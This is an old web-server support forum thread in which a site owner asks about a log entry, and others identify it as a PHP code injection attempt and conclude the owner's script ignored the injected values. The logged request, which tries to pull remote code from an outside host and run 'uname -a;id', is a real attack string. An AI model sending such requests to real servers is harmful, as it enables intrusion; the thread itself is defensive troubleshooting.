Strange Log Entry

 
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions
View previous topic :: View next topic  
Author Message
mg66
-


Joined: 15 Aug 2004
Posts: 85
Location: USA, Illinois

PostPosted: Sun Sep 11, 2005 2:54 am    Post subject: Strange Log Entry Reply with quote

Anyone seen a log entry like this ...

201.11.86.80 - - [10/Sep/2005:18:57:54 -0500] "GET //index.php?x=http://www.go0gler.com/cmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 10994 "" ""
_________________
mg66

http://sv650.metromain.net
http://photography.metromain.net
http://weather.metromain.net
http://www.metromain.net
http://www.bghi.us


Abyss Web Server X2
Back to top View user's profile Send private message Visit poster's website
TRUSTAbyss
-


Joined: 29 Oct 2003
Posts: 3752
Location: USA, GA

PostPosted: Sun Sep 11, 2005 3:15 am    Post subject: Reply with quote

That looks like a Code Injection attack. Download the cmd.gif and rename it to
cmd.txt , you will see that it contains Malicious PHP code. I would ban the client
from your server to avoid any other problems that may occur. LateR!

Sincerely , TRUSTpunk
Back to top View user's profile Send private message Visit poster's website
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Sun Sep 11, 2005 5:29 pm    Post subject: Reply with quote

TRUSTpunk,

Yes, this looks like a code injection attack but nothing can prove that it was effective (the log file only isn't sufficient).
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
mg66
-


Joined: 15 Aug 2004
Posts: 85
Location: USA, Illinois

PostPosted: Mon Sep 12, 2005 12:24 pm    Post subject: Reply with quote

What can I check from here?

I went through all my php pages and see nothing out the norm.
_________________
mg66

http://sv650.metromain.net
http://photography.metromain.net
http://weather.metromain.net
http://www.metromain.net
http://www.bghi.us


Abyss Web Server X2
Back to top View user's profile Send private message Visit poster's website
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Mon Sep 12, 2005 12:48 pm    Post subject: Reply with quote

mg66 wrote:
What can I check from here?

I went through all my php pages and see nothing out the norm.

Reviewing the code inside your /index.php file can help us know if the parameters that were sent to it on the URL could have been interpreted and used to do something "bad" on your server.
If you want us to check it, please send it to us by email.
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
mg66
-


Joined: 15 Aug 2004
Posts: 85
Location: USA, Illinois

PostPosted: Tue Sep 13, 2005 12:34 pm    Post subject: Reply with quote

I emailed the code. thanks for taking the time to look.
_________________
mg66

http://sv650.metromain.net
http://photography.metromain.net
http://weather.metromain.net
http://www.metromain.net
http://www.bghi.us


Abyss Web Server X2
Back to top View user's profile Send private message Visit poster's website
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Tue Sep 13, 2005 3:28 pm    Post subject: Reply with quote

mg66 wrote:
I emailed the code. thanks for taking the time to look.

The log entry shown above injected two variables: x and cmd.
In your script x is used in a switch() block but the injected value has no effect and is simply ignored.
The other variable cmd which is injected is also ignored since it is not even referenced in your script.
So there was no problem with this injection and your script doesn't look as vulnerable even if there are weired values and variables sent to it.
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
mg66
-


Joined: 15 Aug 2004
Posts: 85
Location: USA, Illinois

PostPosted: Tue Sep 13, 2005 3:57 pm    Post subject: Reply with quote

Thanks for your time and help. Much appreciated.
_________________
mg66

http://sv650.metromain.net
http://photography.metromain.net
http://weather.metromain.net
http://www.metromain.net
http://www.bghi.us


Abyss Web Server X2
Back to top View user's profile Send private message Visit poster's website
TRUSTAbyss
-


Joined: 29 Oct 2003
Posts: 3752
Location: USA, GA

PostPosted: Tue Sep 13, 2005 8:40 pm    Post subject: Reply with quote

If Register Globals is on , could they use this attack even if $cmd is not
referenced in the PHP script ? Im just wondering if thats possible. LateR!
Back to top View user's profile Send private message Visit poster's website
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Wed Sep 14, 2005 11:14 am    Post subject: Reply with quote

TRUSTpunk wrote:
If Register Globals is on , could they use this attack even if $cmd is not
referenced in the PHP script ? Im just wondering if thats possible. LateR!

As far as we know, the answer is "no".
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group